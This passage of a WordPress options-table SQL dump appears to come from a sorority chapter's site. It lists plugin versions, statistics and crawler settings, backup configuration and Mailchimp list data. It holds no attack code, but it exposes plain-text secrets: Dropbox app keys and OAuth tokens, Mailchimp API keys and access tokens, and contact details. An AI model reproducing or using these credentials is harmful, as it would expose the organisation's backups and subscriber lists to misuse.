"wpdm-filemanager\";s:5:\"1.3.0\";s:14:\"wpdm-form-lock\";s:5:\"1.6.1\";s:21:\"wpdm-ftp-file-browser\";s:5:\"2.2.7\";s:17:\"wpdm-google-drive\";s:5:\"1.4.0\";s:14:\"wpdm-i-contact\";s:1:\"1\";s:18:\"wpdm-lazy-download\";s:5:\"2.3.0\";s:14:\"wpdm-mailchimp\";s:5:\"1.2.0\";s:15:\"wpdm-newsletter\";s:5:\"3.2.0\";s:13:\"wpdm-onedrive\";s:5:\"1.0.0\";s:15:\"wpdm-optinmagic\";s:5:\"1.0.0\";s:18:\"wpdm-page-template\";s:3:\"1.1\";s:16:\"wpdm-pdf-stamper\";s:5:\"1.9.2\";s:15:\"wpdm-pdf-viewer\";s:5:\"1.2.1\";s:18:\"wpdm-pinterest-pin\";s:5:\"1.2.0\";s:21:\"wpdm-premium-packages\";s:5:\"3.9.1\";s:19:\"wpdm-prepaid_credit\";s:5:\"1.6.0\";s:19:\"wpdm-social-connect\";s:1:\"1\";s:18:\"wpdm-speed-control\";s:1:\"1\";s:19:\"wpdm-tinymce-button\";s:5:\"2.7.2\";s:19:\"wpdm-twitter-follow\";s:1:\"1\";s:19:\"wpdm-update-checker\";s:1:\"1\";s:17:\"wpdm-user-reviews\";s:5:\"1.5.0\";s:15:\"wpdm-users-pack\";s:1:\"1\";s:13:\"wpdm-webhooks\";s:1:\"1\";s:9:\"wpdm-zoho\";s:1:\"1\";s:10:\"wpdmpp-2co\";s:5:\"1.5.2\";s:14:\"wpdmpp-advcash\";s:5:\"1.0.1\";s:20:\"wpdmpp-authorize_net\";s:5:\"1.3.0\";s:14:\"wpdmpp-bluepay\";s:1:\"1\";s:15:\"wpdmpp-coinbase\";s:5:\"1.2.0\";s:15:\"wpdmpp-data-api\";s:1:\"1\";s:13:\"wpdmpp-orange\";s:5:\"1.3.0\";s:14:\"wpdmpp-payfast\";s:1:\"1\";s:16:\"wpdmpp-PaypalPro\";s:5:\"1.3.1\";s:12:\"wpdmpp-payza\";s:1:\"1\";s:11:\"wpdmpp-payu\";s:5:\"1.1.0\";s:19:\"wpdmpp-sales-report\";s:1:\"1\";s:13:\"wpdmpp-skrill\";s:1:\"1\";s:13:\"wpdmpp-stripe\";s:5:\"1.3.2\";s:12:\"wpdmpp-wepay\";s:1:\"1\";s:15:\"wpdmpp-worldpay\";s:1:\"1\";s:15:\"wppromembership\";s:5:\"2.3.7\";s:11:\"theme|verse\";s:5:\"1.4.0\";}\";','yes'),(19626,'wp_statistics_plugin_version','12.3.6.1','yes'),(19627,'wp_statistics_db_version','12.3.6.1','yes'),(19628,'wp_statistics','a:27:{s:18:\"pending_db_updates\";a:2:{s:13:\"date_ip_agent\";b:0;s:11:\"unique_date\";b:0;}s:16:\"search_converted\";i:1;s:5:\"geoip\";b:0;s:8:\"browscap\";b:0;s:10:\"useronline\";b:1;s:6:\"visits\";b:1;s:8:\"visitors\";b:1;s:5:\"pages\";b:1;s:12:\"check_online\";s:2:\"30\";s:8:\"menu_bar\";b:0;s:11:\"coefficient\";s:1:\"1\";s:12:\"stats_report\";b:0;s:11:\"time_report\";s:5:\"daily\";s:11:\"send_report\";s:4:\"mail\";s:14:\"content_report\";s:0:\"\";s:12:\"update_geoip\";b:1;s:8:\"store_ua\";b:0;s:9:\"robotlist\";s:1715:\"007ac9\n5bot\nA6-Indexer\nAbachoBOT\naccoona\nAcoiRobot\nAddThis.com\nADmantX\nAdsBot-Google\nadvbot\nAhrefsBot\naiHitBot\nalexa\nalphabot\nAltaVista\nAntivirusPro\nanyevent\nappie\nApplebot\narchive.org_bot\nAsk Jeeves\nASPSeek\nBaiduspider\nBenjojo\nBeetleBot\nbingbot\nBlekkobot\nblexbot\nBOT for JCE\nbubing\nButterfly\ncbot\nclamantivirus\ncliqzbot\nclumboot\ncoccoc\ncrawler\nCrocCrawler\ncrowsnest.tv\ndbot\ndl2bot\ndotbot\ndownloadbot\nduckduckgo\nDumbot\nEasouSpider\neStyle\nEveryoneSocialBot\nExabot\nezooms\nfacebook.com\nfacebookexternalhit\nFAST\nFeedfetcher-Google\nfeedzirra\nfindxbot\nFirfly\nFriendFeedBot\nfroogle\nGeonaBot\nGigabot\ngirafabot\ngimme60bot\nglbot\nGooglebot\nGroupHigh\nia_archiver\nIDBot\nInfoSeek\ninktomi\nIstellaBot\njetmon\nKraken\nLeikibot\nlinkapediabot\nlinkdexbot\nLinkpadBot\nLoadTimeBot\nlooksmart\nltx71\nLycos\nMail.RU_Bot\nMe.dium\nmeanpathbot\nmediabot\nmedialbot\nMediapartners-Google\nMJ12bot\nmsnbot\nMojeekBot\nmonobot\nmoreover\nMRBOT\nNationalDirectory\nNerdyBot\nNetcraftSurveyAgent\nniki-bot\nnutch\nOpenbot\nOrangeBot\nowler\np4Bot\nPaperLiBot\npageanalyzer\nPagesInventory\nPimonster\nporkbun\npr-cy\nproximic\npwbot\nr4bot\nrabaz\nRambler\nRankivabot\nrevip\nriddler\nrogerbot\nScooter\nScrubby\nscrapy.org\nSearchmetricsBot\nsees.co\nSemanticBot\nSemrushBot\nSeznamBot\nsfFeedReader\nshareaholic-bot\nsistrix\nSiteExplorer\nSlurp\nSocialradarbot\nSocialSearch\nSogou web spider\nSpade\nspbot\nSpiderLing\nSputnikBot\nSuperfeedr\nSurveyBot\nTechnoratiSnoop\nTECNOSEEK\nTeoma\ntrendictionbot\nTweetmemeBot\nTwiceler\nTwitterbot\nTwitturls\nu2bot\nuMBot-LN\nuni5download\nunrulymedia\nUptimeRobot\nURL_Spider_SQL\nVagabondo\nvBSEO\nWASALive-Bot\nWebAlta Crawler\nWebBug\nWebFindBot\nWebMasterAid\nWeSEE\nWotbox\nwsowner\nwsr-agent\nwww.galaxy.com\nx100bot\nXoviBot\nxzybot\nyandex\nYahoo\nYammybot\nYoudaoBot\nZyBorg\nZemlyaCrawl\";s:21:\"exclude_administrator\";s:1:\"1\";s:18:\"disable_se_clearch\";b:1;s:14:\"disable_se_ask\";b:1;s:8:\"map_type\";s:6:\"jqvmap\";s:18:\"force_robot_update\";b:1;s:15:\"update_browscap\";b:1;s:17:\"show_welcome_page\";b:1;s:23:\"first_show_welcome_page\";b:1;s:15:\"opt_out_message\";s:415:\"This website stores some user agent data. These data are used to provide a more personalized experience and to track your whereabouts around our website in compliance with the European General Data Protection Regulation. If you decide to opt-out of any future tracking, a cookie will be set up in your browser to remember this choice for one year. <a href=\"%accept_url%\">I Agree</a>, <a href=\"%cancel_url%\">Deny</a>\";}','yes'),(18685,'cdm_ignore_shortcode','1','yes'),(6866,'sp_cdm_user_log','<strong>December 17, 2016 7:27 pm:</strong> pr@zphiblgz.org Deleted file: Constitution & By-Laws<br>','yes'),(8710,'wpadm_backup_dropbox-setting','YTo3OntzOjg6ImlzX2FkbWluIjtpOjE7czo3OiJhcHBfa2V5IjtzOjE1OiJudjc1MW44NHcybmlmNmoiO3M6MTA6ImFwcF9zZWNyZXQiO3M6MTU6InFsbGFzZDR0Ym5xaDRvaSI7czoxNzoiYXV0aF90b2tlbl9zZWNyZXQiO2E6Mzp7czoxODoib2F1dGhfdG9rZW5fc2VjcmV0IjtzOjE1OiI4b3Z1ZWZnODBxY2NlMmgiO3M6MTE6Im9hdXRoX3Rva2VuIjtzOjE2OiJwNjZnNWNrdGlpYjdyM2NmIjtzOjM6InVpZCI7czo5OiI2MzQ5NTUzMzkiO31zOjExOiJvYXV0aF90b2tlbiI7czoxNjoickREdlRRWUo1UHNmaDE0TCI7czozOiJ1aWQiO3M6OToiNjM0OTU1MzM5IjtzOjEzOiJiYWNrdXBfZm9sZGVyIjtzOjY1OiIvaG9tZTQvenBoaWJsZ3ovcHVibGljX2h0bWwvZGV2ZWxvcG1lbnQvd3AtY29udGVudC9Ecm9wYm94X0JhY2t1cCI7fQ==','yes'),(8715,'wpadm_backup__commands','a:1:{i:0;a:3:{s:6:\"method\";s:15:\"send-to-dropbox\";s:6:\"params\";a:6:{s:5:\"files\";s:0:\"\";s:5:\"local\";b:1;s:15:\"is_local_backup\";i:0;s:14:\"access_details\";a:5:{s:3:\"key\";s:15:\"nv751n84w2nif6j\";s:6:\"secret\";s:15:\"qllasd4tbnqh4oi\";s:5:\"token\";a:3:{s:18:\"oauth_token_secret\";s:15:\"8ovuefg80qcce2h\";s:11:\"oauth_token\";s:16:\"p66g5cktiib7r3cf\";s:3:\"uid\";s:9:\"634955339\";}s:3:\"dir\";s:0:\"\";s:6:\"folder\";s:24:\"development_zphiblgz_org\";}s:4:\"time\";i:1483067290;s:13:\"is_folder_set\";b:1;}s:4:\"work\";i:0;}}','yes'),(8716,'wpadm_backup_proccess-command','a:2:{i:0;a:2:{s:7:\"command\";s:2:\"db\";s:4:\"work\";i:1;}i:1;a:2:{s:7:\"command\";s:7:\"archive\";s:4:\"work\";i:1;}}','yes'),(9747,'mc_user','a:11:{s:10:\"account_id\";s:25:\"e3e857a830f2d15e874240977\";s:12:\"account_name\";s:53:\"Zeta Phi Beta Sorority Inc, Lambda Gamma Zeta Chapter\";s:5:\"email\";s:15:\"pr@zphiblgz.org\";s:8:\"username\";s:8:\"zphiblgz\";s:4:\"role\";s:5:\"owner\";s:7:\"contact\";a:7:{s:7:\"company\";s:53:\"Zeta Phi Beta Sorority Inc, Lambda Gamma Zeta Chapter\";s:5:\"addr1\";s:11:\"PO Box 7002\";s:5:\"addr2\";s:0:\"\";s:4:\"city\";s:8:\"Columbia\";s:5:\"state\";s:2:\"MD\";s:3:\"zip\";s:5:\"21045\";s:7:\"country\";s:2:\"US\";}s:11:\"pro_enabled\";b:0;s:10:\"last_login\";s:25:\"2016-12-30T17:03:48+00:00\";s:17:\"total_subscribers\";i:113;s:14:\"industry_stats\";a:3:{s:9:\"open_rate\";d:0.21764468919324001;s:11:\"bounce_rate\";d:0.012312175641492999;s:10:\"click_rate\";d:0.023032463111629001;}s:6:\"_links\";a:13:{i:0;a:4:{s:3:\"rel\";s:4:\"self\";s:4:\"href\";s:35:\"https://us11.api.mailchimp.com/3.0/\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:51:\"https://us11.api.mailchimp.com/schema/3.0/Root.json\";}i:1;a:5:{s:3:\"rel\";s:5:\"lists\";s:4:\"href\";s:40:\"https://us11.api.mailchimp.com/3.0/lists\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:63:\"https://us11.api.mailchimp.com/schema/3.0/Lists/Collection.json\";s:6:\"schema\";s:68:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Lists.json\";}i:2;a:5:{s:3:\"rel\";s:7:\"reports\";s:4:\"href\";s:42:\"https://us11.api.mailchimp.com/3.0/reports\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:65:\"https://us11.api.mailchimp.com/schema/3.0/Reports/Collection.json\";s:6:\"schema\";s:70:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Reports.json\";}i:3;a:5:{s:3:\"rel\";s:13:\"conversations\";s:4:\"href\";s:48:\"https://us11.api.mailchimp.com/3.0/conversations\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:71:\"https://us11.api.mailchimp.com/schema/3.0/Conversations/Collection.json\";s:6:\"schema\";s:76:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Conversations.json\";}i:4;a:5:{s:3:\"rel\";s:9:\"campaigns\";s:4:\"href\";s:44:\"https://us11.api.mailchimp.com/3.0/campaigns\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:67:\"https://us11.api.mailchimp.com/schema/3.0/Campaigns/Collection.json\";s:6:\"schema\";s:72:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Campaigns.json\";}i:5;a:5:{s:3:\"rel\";s:11:\"automations\";s:4:\"href\";s:46:\"https://us11.api.mailchimp.com/3.0/automations\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:69:\"https://us11.api.mailchimp.com/schema/3.0/Automations/Collection.json\";s:6:\"schema\";s:74:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Automations.json\";}i:6;a:5:{s:3:\"rel\";s:9:\"templates\";s:4:\"href\";s:44:\"https://us11.api.mailchimp.com/3.0/templates\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:67:\"https://us11.api.mailchimp.com/schema/3.0/Templates/Collection.json\";s:6:\"schema\";s:72:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Templates.json\";}i:7;a:4:{s:3:\"rel\";s:12:\"file-manager\";s:4:\"href\";s:47:\"https://us11.api.mailchimp.com/3.0/file-manager\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:68:\"https://us11.api.mailchimp.com/schema/3.0/FileManager/Namespace.json\";}i:8;a:4:{s:3:\"rel\";s:15:\"authorized-apps\";s:4:\"href\";s:50:\"https://us11.api.mailchimp.com/3.0/authorized-apps\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:72:\"https://us11.api.mailchimp.com/schema/3.0/AuthorizedApps/Collection.json\";}i:9;a:4:{s:3:\"rel\";s:7:\"batches\";s:4:\"href\";s:42:\"https://us11.api.mailchimp.com/3.0/batches\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:65:\"https://us11.api.mailchimp.com/schema/3.0/Batches/Collection.json\";}i:10;a:4:{s:3:\"rel\";s:16:\"template-folders\";s:4:\"href\";s:51:\"https://us11.api.mailchimp.com/3.0/template-folders\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:73:\"https://us11.api.mailchimp.com/schema/3.0/TemplateFolders/Collection.json\";}i:11;a:4:{s:3:\"rel\";s:16:\"campaign-folders\";s:4:\"href\";s:51:\"https://us11.api.mailchimp.com/3.0/campaign-folders\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:73:\"https://us11.api.mailchimp.com/schema/3.0/CampaignFolders/Collection.json\";}i:12;a:4:{s:3:\"rel\";s:9:\"ecommerce\";s:4:\"href\";s:44:\"https://us11.api.mailchimp.com/3.0/ecommerce\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:66:\"https://us11.api.mailchimp.com/schema/3.0/Ecommerce/Namespace.json\";}}}','yes'),(9748,'mc_datacenter','us11','yes'),(9751,'widget_mailchimpsf_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(9752,'mc_list_id','6feb90d20b','yes'),(9753,'mc_list_name','Z-Connect Subscription','yes'),(9754,'mc_header_content','Sign up for our newsletter! ','yes'),(9755,'mc_submit_text','Subscribe','yes'),(9756,'mc_use_datepicker','on','yes'),(9757,'mc_custom_style','off','yes'),(9758,'mc_use_javascript','on','yes'),(9759,'mc_double_optin','1','yes'),(9760,'mc_use_unsub_link','off','yes'),(9761,'mc_header_border_width','1','yes'),(9762,'mc_header_border_color','E3E3E3','yes'),(9763,'mc_header_background','FFFFFF','yes'),(9764,'mc_header_text_color','CC6600','yes'),(9765,'mc_form_border_width','1','yes'),(9766,'mc_form_border_color','E0E0E0','yes'),(9767,'mc_form_background','FFFFFF','yes'),(9768,'mc_form_text_color','3F3F3f','yes'),(9769,'mc_merge_vars','a:3:{i:0;a:7:{s:3:\"tag\";s:5:\"EMAIL\";s:4:\"name\";s:13:\"Email Address\";s:4:\"type\";s:5:\"email\";s:8:\"required\";b:1;s:6:\"public\";b:1;s:13:\"display_order\";i:1;s:13:\"default_value\";N;}i:1;a:12:{s:8:\"merge_id\";i:1;s:3:\"tag\";s:5:\"FNAME\";s:4:\"name\";s:10:\"First Name\";s:4:\"type\";s:4:\"text\";s:8:\"required\";b:0;s:13:\"default_value\";s:0:\"\";s:6:\"public\";b:1;s:13:\"display_order\";i:2;s:7:\"options\";a:1:{s:4:\"size\";i:25;}s:9:\"help_text\";s:0:\"\";s:7:\"list_id\";s:10:\"6feb90d20b\";s:6:\"_links\";a:4:{i:0;a:4:{s:3:\"rel\";s:4:\"self\";s:4:\"href\";s:66:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields/1\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:86:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/Response.json\";}i:1;a:5:{s:3:\"rel\";s:6:\"parent\";s:4:\"href\";s:64:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:96:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/CollectionResponse.json\";s:6:\"schema\";s:80:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Lists/MergeFields.json\";}i:2;a:5:{s:3:\"rel\";s:6:\"update\";s:4:\"href\";s:66:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields/1\";s:6:\"method\";s:5:\"PATCH\";s:12:\"targetSchema\";s:86:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/Response.json\";s:6:\"schema\";s:83:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/PATCH.json\";}i:3;a:3:{s:3:\"rel\";s:6:\"delete\";s:4:\"href\";s:66:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields/1\";s:6:\"method\";s:6:\"DELETE\";}}}i:2;a:12:{s:8:\"merge_id\";i:2;s:3:\"tag\";s:5:\"LNAME\";s:4:\"name\";s:9:\"Last Name\";s:4:\"type\";s:4:\"text\";s:8:\"required\";b:0;s:13:\"default_value\";s:0:\"\";s:6:\"public\";b:1;s:13:\"display_order\";i:3;s:7:\"options\";a:1:{s:4:\"size\";i:25;}s:9:\"help_text\";s:0:\"\";s:7:\"list_id\";s:10:\"6feb90d20b\";s:6:\"_links\";a:4:{i:0;a:4:{s:3:\"rel\";s:4:\"self\";s:4:\"href\";s:66:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields/2\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:86:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/Response.json\";}i:1;a:5:{s:3:\"rel\";s:6:\"parent\";s:4:\"href\";s:64:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields\";s:6:\"method\";s:3:\"GET\";s:12:\"targetSchema\";s:96:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/CollectionResponse.json\";s:6:\"schema\";s:80:\"https://us11.api.mailchimp.com/schema/3.0/CollectionLinks/Lists/MergeFields.json\";}i:2;a:5:{s:3:\"rel\";s:6:\"update\";s:4:\"href\";s:66:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields/2\";s:6:\"method\";s:5:\"PATCH\";s:12:\"targetSchema\";s:86:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/Response.json\";s:6:\"schema\";s:83:\"https://us11.api.mailchimp.com/schema/3.0/Definitions/Lists/Merge-Fields/PATCH.json\";}i:3;a:3:{s:3:\"rel\";s:6:\"delete\";s:4:\"href\";s:66:\"https://us11.api.mailchimp.com/3.0/lists/6feb90d20b/merge-fields/2\";s:6:\"method\";s:6:\"DELETE\";}}}}','yes'),(9770,'mc_mv_EMAIL','on','yes'),(9771,'mc_mv_FNAME','on','yes'),(9772,'mc_mv_LNAME','on','yes'),(9773,'mc_interest_groups','a:0:{}','yes'),(9783,'mc_rewards','off','yes'),(9777,'mc_merge_field_migrate','1','yes'),(9784,'mc_subheader_content','','yes'),(9822,'widget_mc4wp_form_widget','a:2:{i:2;a:1:{s:5:\"title\";s:9:\"Subscribe\";}s:12:\"_multiwidget\";i:1;}','yes'),(9823,'mc4wp_version','4.0.11','yes'),(9824,'mc4wp_flash_messages','a:0:{}','no'),(9825,'mc4wp','a:4:{s:7:\"api_key\";s:37:\"f50270e0b5703f32d39122017940d980-us11\";s:20:\"allow_usage_tracking\";i:0;s:15:\"debug_log_level\";s:7:\"warning\";s:18:\"first_activated_on\";i:1483118357;}','yes'),(9841,'mc4wp_mailchimp_lists_v3_fallback','a:5:{s:10:\"99364da58b\";O:20:\"MC4WP_MailChimp_List\":6:{s:2:\"id\";s:10:\"99364da58b\";s:6:\"web_id\";s:6:\"264065\";s:4:\"name\";s:14:\"Maryland Zetas\";s:16:\"subscriber_count\";i:51;s:12:\"merge_fields\";a:4:{i:0;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:13:\"Email Address\";s:10:\"field_type\";s:5:\"email\";s:3:\"tag\";s:5:\"EMAIL\";s:8:\"required\";b:1;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:1;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:10:\"First Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"FNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:2;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:9:\"Last Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"LNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:3;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:12:\"Chapter Type\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:7:\"MMERGE3\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}}s:19:\"interest_categories\";a:0:{}}s:10:\"f04f60209c\";O:20:\"MC4WP_MailChimp_List\":6:{s:2:\"id\";s:10:\"f04f60209c\";s:6:\"web_id\";s:6:\"268013\";s:4:\"name\";s:25:\"Howard County High School\";s:16:\"subscriber_count\";i:42;s:12:\"merge_fields\";a:5:{i:0;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:13:\"Email Address\";s:10:\"field_type\";s:5:\"email\";s:3:\"tag\";s:5:\"EMAIL\";s:8:\"required\";b:1;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:1;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:10:\"First Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"FNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:2;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:9:\"Last Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"LNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:3;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:6:\"School\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:7:\"MMERGE3\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:4;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:8:\"Position\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:7:\"MMERGE4\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}}s:19:\"interest_categories\";a:0:{}}s:10:\"85a10b40bf\";O:20:\"MC4WP_MailChimp_List\":6:{s:2:\"id\";s:10:\"85a10b40bf\";s:6:\"web_id\";s:6:\"268017\";s:4:\"name\";s:18:\"Community Churches\";s:16:\"subscriber_count\";i:6;s:12:\"merge_fields\";a:3:{i:0;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:13:\"Email Address\";s:10:\"field_type\";s:5:\"email\";s:3:\"tag\";s:5:\"EMAIL\";s:8:\"required\";b:1;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:1;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:10:\"First Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"FNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:2;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:9:\"Last Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"LNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}}s:19:\"interest_categories\";a:0:{}}s:10:\"1a16e1e1c9\";O:20:\"MC4WP_MailChimp_List\":6:{s:2:\"id\";s:10:\"1a16e1e1c9\";s:6:\"web_id\";s:6:\"268021\";s:4:\"name\";s:23:\"Maryland Phi Beta Sigma\";s:16:\"subscriber_count\";i:5;s:12:\"merge_fields\";a:4:{i:0;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:13:\"Email Address\";s:10:\"field_type\";s:5:\"email\";s:3:\"tag\";s:5:\"EMAIL\";s:8:\"required\";b:1;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:1;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:10:\"First Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"FNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:2;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:9:\"Last Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"LNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:3;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:4:\"Type\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:7:\"MMERGE3\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}}s:19:\"interest_categories\";a:0:{}}s:10:\"6feb90d20b\";O:20:\"MC4WP_MailChimp_List\":6:{s:2:\"id\";s:10:\"6feb90d20b\";s:6:\"web_id\";s:6:\"274877\";s:4:\"name\";s:22:\"Z-Connect Subscription\";s:16:\"subscriber_count\";i:9;s:12:\"merge_fields\";a:3:{i:0;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:13:\"Email Address\";s:10:\"field_type\";s:5:\"email\";s:3:\"tag\";s:5:\"EMAIL\";s:8:\"required\";b:1;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:1;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:10:\"First Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"FNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}i:2;O:27:\"MC4WP_MailChimp_Merge_Field\":7:{s:4:\"name\";s:9:\"Last Name\";s:10:\"field_type\";s:4:\"text\";s:3:\"tag\";s:5:\"LNAME\";s:8:\"required\";b:0;s:7:\"choices\";a:0:{}s:6:\"public\";b:1;s:13:\"default_value\";s:0:\"\";}}s:19:\"interest_categories\";a:0:{}}}','no'),(9855,'mc4wp_form_stylesheets','a:0:{}','yes'),(9854,'mc4wp_default_form_id','763','yes'),(9856,'mc4wp_form_preview_id','764','no'),(9922,'mc_mm_activation_redirect','false','yes'),(9923,'widget_mc_mm_widget','a:2:{i:3;a:2:{s:5:\"title\";s:0:\"\";s:7:\"form_id\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(9924,'mc_mm_activation_date','1483119857','yes'),(9925,'mc_mm_user_token','dd0362178c49bacfbf405365','yes'),(9926,'mc_mm_site_id','282963','yes'),(9935,'mc_mm_mailchimp_list_id','6feb90d20b','yes'),(9932,'mc_mm_mailchimp_access_token','a2611288b3c2cfc5421969359d887fde-us11','yes'),(15252,'widget_acx-social-icons-widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(11288,'widget_synved_social_share','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(11289,'widget_synved_social_follow','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(11290,'synved_connect_install_date','1483195571','yes'),(11291,'synved_version','1.8.3','yes'),(11292,'synved_social_settings','a:1:{s:24:\"accepted_sharethis_terms\";b:1;}','yes'),(11561,'cf7skins','a:2:{s:12:\"color_scheme\";s:7:\"default\";s:11:\"delete_data\";b:0;}','yes'),(11560,'cf7skins_version_installed','1.2','yes'),(12547,'hopeful_page_templates','a:3:{s:22:\"ts-template-1483463628\";a:2:{s:4:\"name\";s:14:\"Program 